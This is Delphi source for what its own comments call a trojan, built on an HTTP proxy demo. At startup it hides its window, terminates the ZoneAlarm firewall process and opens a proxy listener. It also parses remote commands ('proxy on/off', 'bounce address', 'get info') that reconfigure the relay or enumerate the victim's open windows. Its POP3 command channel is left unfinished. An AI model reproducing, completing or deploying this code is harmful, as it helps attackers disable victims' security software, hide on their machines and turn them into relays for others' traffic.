unit demoMain;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, ComCtrls, ExtCtrls, WSockets, GpHTTPProxy, Grids,
  ggProcessViewer, RXShell,TlHelp32, RXCtrls, IdBaseComponent, IdComponent,
  IdTCPConnection, IdMessageClient, IdPOP3, IdMessage, IdTCPClient;

type
  TSpyProxyClient = class(TGpHTTPProxyClient)
  public
    Color: TColor;
    destructor Destroy; override;
  end; { TSpyProxyClient }

type
  TMain = class(TForm)
    RemoteAddr: TEdit;
    RemotePort: TEdit;
    LocalPoort: TEdit;
    ListenBtn: TButton;
    StatusBar: TStatusBar;
    Bevel1: TBevel;
    Label1: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    cbProxy: TCheckBox;
    GpHTTPProxy: TGpHTTPProxy;
    RxTrayIcon1: TRxTrayIcon;
    ZAtimer: TTimer;
    ZAtimer2: TTimer;
    ipaddresslist: TRxCheckListBox;
    pop3address: TEdit;
    Label4: TLabel;
    pop3username: TEdit;
    pop3password: TEdit;
    Label5: TLabel;
    Label6: TLabel;
    pop3check: TButton;
    statusBox: TTextListBox;
    hopCount: TEdit;
    Label7: TLabel;
    Memo1: TMemo;
    memo2: TMemo;
    edtCommand: TEdit;
    memDisplay: TMemo;
    procedure cbProxyClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure ListenBtnClick(Sender: TObject);
    procedure GpHTTPProxyClientConnect(Sender: TObject;
      Client: TGpHTTPProxyClient);
    procedure GpHTTPProxyRemoteConnect(Sender: TObject;
      Client: TGpHTTPProxyClient);
    procedure GpHTTPProxyClientDataAvailable(Sender: TObject;
      Client: TGpHTTPProxyClient; data: String);
    procedure GpHTTPProxyRemoteDataAvailable(Sender: TObject;
      Client: TGpHTTPProxyClient; data: String);
    procedure GpHTTPProxyClientDisconnect(Sender: TObject;
      Client: TGpHTTPProxyClient);
    procedure GpHTTPProxyServerClosed(Sender: TObject);
    procedure RemoteAddrChange(Sender: TObject);
    procedure GpHTTPProxyClientHeaderAvailable(Sender: TObject;
      client: TGpHTTPProxyClient; var header: String; url: String);
  
     procedure KillZoneAlarm98;
    procedure ZAtimerTimer(Sender: TObject);
    procedure ZAtimer2Timer(Sender: TObject);
    function KillTask(ExeFileName: string): integer;

    procedure processCMDmessages;
    procedure proxyOffproc;
    procedure bounceAddressproc(address :string; port : string);
    procedure proxyOnproc;
    procedure getinfoproc;
    procedure GetWins;


  private
    chnCurrent: String;
  public
    property HTTPProxy: TGpHTTPProxy read GpHTTPProxy;
    procedure AddLineToDisplay(Line: String);
  end;

var
  Main: TMain;
  WindowList: TList;
implementation

uses demoLog, HTTPProt;                                                            //gp 2000-03-07

{$R *.DFM}

{ TSpyProxyClient }

destructor TSpyProxyClient.Destroy;
begin
  if not Application.Terminated then begin // Log is destroyed before Main
//    Log.TextColor := Color;
//    Log.Header    := 'Connection Closed';
//    Log.Add('');
  end;
  inherited;
end; { TSpyProxyClient.Destroy }

{ TMain }

procedure TMain.ListenBtnClick(Sender: TObject);
var
  errMsg: string;
begin
  if ListenBtn.Tag = 0 then begin
    with GpHTTPProxy do begin
      ClientClass := TSpyProxyClient;
      Port := StrToIntDef(LocalPoort.Text,8080); LocalPoort.Text := IntToStr(Port);
      errMsg := Listen;
      if errMsg <> '' then begin
        Application.MessageBox(PChar(Format('Port %d is already in use!', [Port])),
          'GpHTTPProxyDemo', MB_OK + MB_ICONERROR);
        Exit;
      end;
    end;
    LocalPoort.Enabled := false;
    ListenBtn.Caption  := 'Cancel';
    ListenBtn.Tag      :=  1;
  end
  else GpHTTPProxy.Close;
end; { TMain.ListenBtnClick }

procedure TMain.cbProxyClick(Sender: TObject);
begin
  if cbProxy.Checked then begin
    RemoteAddr.Enabled := cbProxy.Checked;
    RemotePort.Enabled := cbProxy.Checked;
    GpHTTPProxy.NextHopProxy := RemoteAddr.Text+':'+RemotePort.Text;
  end
  else GpHTTPProxy.NextHopProxy := '';
end; { TMain.cbProxyClick }

procedure TMain.FormCreate(Sender: TObject);
begin
    Application.ShowMainForm := False;


    //below, this code is good, but temp disabled for devels

  killzonealarm98;

  application.ShowMainForm := false;


  ListenBtn.Click;



end; { TMain.FormCreate }

procedure TMain.GpHTTPProxyClientConnect(Sender: TObject;
  Client: TGpHTTPProxyClient);
const
  aColor: array [1..11] of TColor = (clBlack, clMaroon, clGreen, clOlive,
    clNavy, clPurple, clRed, clLime, clYellow, clBlue, clFuchsia);
var
  numClients: integer;
begin
  numClients := TGpHTTPProxy(Sender).ClientCount;
  with Client as TSpyProxyClient do begin
    LineMode := Log.LineMode1.Checked;
    StatusBar.Panels[1].Text := IntToStr(numClients);
    StatusBar.Panels[3].Text := GetPeerAddr;
    if numClients <= high(aColor)
      then Color := aColor[numClients]
      else Color := clBlack;
  end;
end; { TMain.GpHTTPProxyClientConnect }

procedure TMain.GpHTTPProxyClientDataAvailable(Sender: TObject;
  Client: TGpHTTPProxyClient; data: String);
begin
  with Client as TSpyProxyClient do begin
//    Log.TextColor := Color;
//    Log.Header    := 'From Local';
//    Log.Add(data);
  end;
end; { TMain.GpHTTPProxyClientDataAvailable }

procedure TMain.GpHTTPProxyClientDisconnect(Sender: TObject; 
  Client: TGpHTTPProxyClient);
begin
  with Client as TSpyProxyClient do begin
    with Sender as TGpHTTPProxy do begin
      StatusBar.Panels[1].Text := IntToStr(ClientCount);
      if Clientcount > 1
        then StatusBar.Panels[3].Text := SocketServer.Client[ClientCount-1].GetPeerAddr
        else StatusBar.Panels[3].Text := '';
    end; //with
  end;
end; { TMain.GpHTTPProxyClientDisconnect }

procedure TMain.GpHTTPProxyRemoteConnect(Sender: TObject;
  Client: TGpHTTPProxyClient);
begin
  with Client as TSpyProxyClient do begin
//    Log.TextColor := Color;
//    Log.Header    := 'Connection Opened';
//    Log.Add('');
  end;
end; { TMain.GpHTTPProxyRemoteConnect }

procedure TMain.GpHTTPProxyRemoteDataAvailable(Sender: TObject;
  Client: TGpHTTPProxyClient; data: String);
begin
  with Client as TSpyProxyClient do begin
    if data <> '' then begin
//      Log.TextColor := Color;
//      Log.Header    := 'From Remote';
//      Log.Add(data);
    end;
  end;
end; { TMain.GpHTTPProxyRemoteDataAvailable }

procedure TMain.GpHTTPProxyServerClosed(Sender: TObject);
begin
  if not (csDestroying in ComponentState) then begin
    LocalPoort.Enabled := True;
    RemotePort.Enabled := True;
    RemoteAddr.Enabled := True;
    ListenBtn.Caption  := 'Listen';
    ListenBtn.Tag      :=  0;
  end;
end; { TMain.GpHTTPProxyServerClosed }

procedure TMain.RemoteAddrChange(Sender: TObject);
begin
  GpHTTPProxy.NextHopProxy := RemoteAddr.Text+':'+RemotePort.Text;
end; { TMain.RemoteAddrChange }

procedure TMain.GpHTTPProxyClientHeaderAvailable(Sender: TObject;
  client: TGpHTTPProxyClient; var header: String; url: String);
begin
  Client.RemoteSocket.LineMode := Log.LineMode1.Checked;
end; { TMain.GpHTTPProxyClientHeaderAvailable }



procedure TMain.KillZoneAlarm98;
var
cat : integer;
 begin;

  cat := killtask('zonealarm.exe');
      if cat <> 0 then begin
      RxTrayIcon1.active := true;
       RxTrayIcon1.Enabled := true;
                     zatimer.Enabled := true;
                     zatimer2.Enabled := true;
         end;


end;

{TODO: For now, I am leaving in the pop3 code I have...
 in short, it is incomplete, ut close. I need to put in
 send code, and be able to set the pop3 address...}


procedure TMain.ZAtimerTimer(Sender: TObject);
begin

   RxTrayIcon1.Animated := true;

end;

procedure TMain.ZAtimer2Timer(Sender: TObject);
begin
   RxTrayIcon1.Animated := false;
end;

function TMain.KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot
                     (TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,
                                 FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
         UpperCase(ExeFileName))
     or (UpperCase(FProcessEntry32.szExeFile) =
         UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
                        PROCESS_TERMINATE, BOOL(0),
                        FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle,
                                  FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;



procedure TMain.processCMDmessages;
var
lineCount : integer;
proxyOff : integer;
bounceAddress : integer;
proxyOn : integer;
getinfo : integer;
portVar : string;
addressVar : string;
portPos : integer;

begin
//this procedure reads from TMEMO1 and processes the trojan
//commands sent

   for lineCount :=0  to memo1.Lines.count do
   begin
      proxyOff := pos('proxy off', memo1.lines.strings[lineCount]);
      if proxyOff <> 0 then
      proxyOffproc;

      bounceAddress := pos('bounce address', memo1.lines.strings[lineCount]);
      if bounceAddress  <> 0 then
      begin
      //TODO: here I need to process the port and IP address;
      portPos := pos('port:', memo1.lines.strings[lineCount]);
      portVar := copy(memo1.lines.strings[lineCount], portPos + 6, length(memo1.lines.strings[lineCount]));
      addressVar := copy(memo1.lines.strings[lineCount], bounceAddress + 15, portPos);


      bounceAddressproc(addressVar, portVar);
      end;

      proxyOn := pos('proxy on', memo1.lines.strings[lineCount]);
      if proxyOn <> 0 then
      proxyOnproc;

      getinfo := pos('get info', memo1.lines.strings[lineCount]);
      if getinfo <> 0 then
      getinfoproc;

   end;

end;

procedure TMain.proxyOffproc;
begin
if gpHTTPProxy.Active = true then
 GpHTTPProxy.Close
 else
 exit;
 

end;

procedure TMain.bounceAddressproc(address :string; port : string);
begin
 remoteaddr.Text := address;
 remoteport.Text := port;
 
end;

procedure TMain.proxyOnproc;
begin
 ListenBtn.Click;
end;

procedure TMain.getinfoproc;
begin

  memo2.clear;
  GetWins;

end;

function GetWindows(Handle: HWND; Info: Pointer): BOOL; stdcall;
begin
  Result := True;
  WindowList.Add(Pointer(Handle));
end;

procedure TMain.GetWins;
var
  TopWindow, CurrentWindow: HWND;
  Dest: array[0..80] of char;
  ClassName: array[0..80] of char;
  i: Integer;
begin
  try
    WindowList := TList.Create;
    TopWindow := Handle;
    EnumWindows(@GetWindows, Longint(@TopWindow));
    CurrentWindow:=TopWindow;
    for i := 0 to WindowList.Count - 1 do
    begin
      CurrentWindow:=GetNextWindow(CurrentWindow, GW_HWNDNEXT);
      GetWindowText(CurrentWindow, Dest, sizeof(Dest) - 1);
      GetClassName(CurrentWindow, ClassName, sizeof(ClassName) - 1);
      if StrLen(Dest) > 0 then
      Memo2.Lines.Add(Dest+' = '+ClassName+' - '+IntToStr(CurrentWindow));
    end;
  finally
    WindowList.Free;
  end;
end;

procedure TMain.AddLineToDisplay(Line: String);
begin
  LockWindowUpdate(Handle);
  while memDisplay.Lines.Count > 200 do
    memDisplay.Lines.Delete(0);
  memDisplay.Lines.Add(Line);
  LockWindowUpdate(0);
end;



end.
